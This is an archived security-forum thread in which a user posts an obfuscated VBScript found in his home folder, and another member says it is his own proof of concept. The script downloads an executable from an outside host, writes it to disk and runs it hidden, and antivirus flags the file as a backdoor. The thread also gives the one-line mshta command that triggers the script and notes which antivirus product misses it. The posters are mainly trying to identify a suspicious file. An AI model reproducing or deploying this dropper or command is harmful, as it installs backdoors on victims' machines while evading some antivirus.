hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

bonarez
when i need to dl something quickly I usualy open a cmd and wget it, default it opens my homedir and today i find a weird vbs in this dir:
CODE

Dim i
Dim j
Set j = CreateObject("M"+"i"+"c"+"r"+"o"+"s"+"o"+"f"+"t"+"."+"X"+"M"+"L"+"H"+"T"+"T"+"P")
j.Open "GET", "http://sec.gravito.com/hta3/test.exe", False
j.Send
i = j.ResponseBody
Const k = 1
Const l = 2
Dim m
Set m = CreateObject("A"+"D"+"O"+"D"+"B"+"."+"S"+"t"+"r"+"e"+"a"+"m")
m.Type = k
m.Open
m.Write i
m.SaveToFile "test.exe", l
Dim n
Set n = CreateObject("W"+"S"+"c"+"r"+"i"+"p"+"t"+"."+"S"+"h"+"e"+"l"+"l"+"")
n.Run "test.exe", 0, false


I already tried dl the exe myself, and my av detects it as being BDS/Iwill.A.3

now is this some remaining code from some program I dl from govsec? since a google for gravito led me to a link in a certain govsec member's signature...

If anyone could clear this up plz. I hate feeling 'compromized'
BuzzDee
maybe u clicked one of illwill's POC links? ;D
bonarez
last one was illmob.org/0day/firefox-download-and-execute.html, but this one just created a bat..

I'm probably getting way too paranoid biggrin.gif
bonarez
found it:

topic 13720

should have searched more before getting so paranoid! biggrin.gif
ComSec
lol soon as i seen the sec.gravito in the code .... i knew it was one of Yorns tricks wink.gif

glad your paranoia has subsided laugh.gif
Yorn
Yeah, you can probably ignore this if you've ever run the command:
"mshta http://sec.gravito.com/hta3/?test.exe+RUN"

I think most AV pick this up now, but MCAFEE doesn't. I haven't added in the randomization variable because it's not important.

And yeah, it's one of my tricks, no need to be paranoid. I'm not malicious, though I really could be if I wanted to go professional criminal. tongue.gif
bonarez
tried running it again, just curious.

C:\DOCUMENTS AND.....\CONTENT.IE5\AJIVEX23\TEST[1].EXE

Contains a signature of the (dangerous) backdoor program BDS/Iwill.A.3 Backdoor server programs.

edit: running free-av but doesn't complain about the hta
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.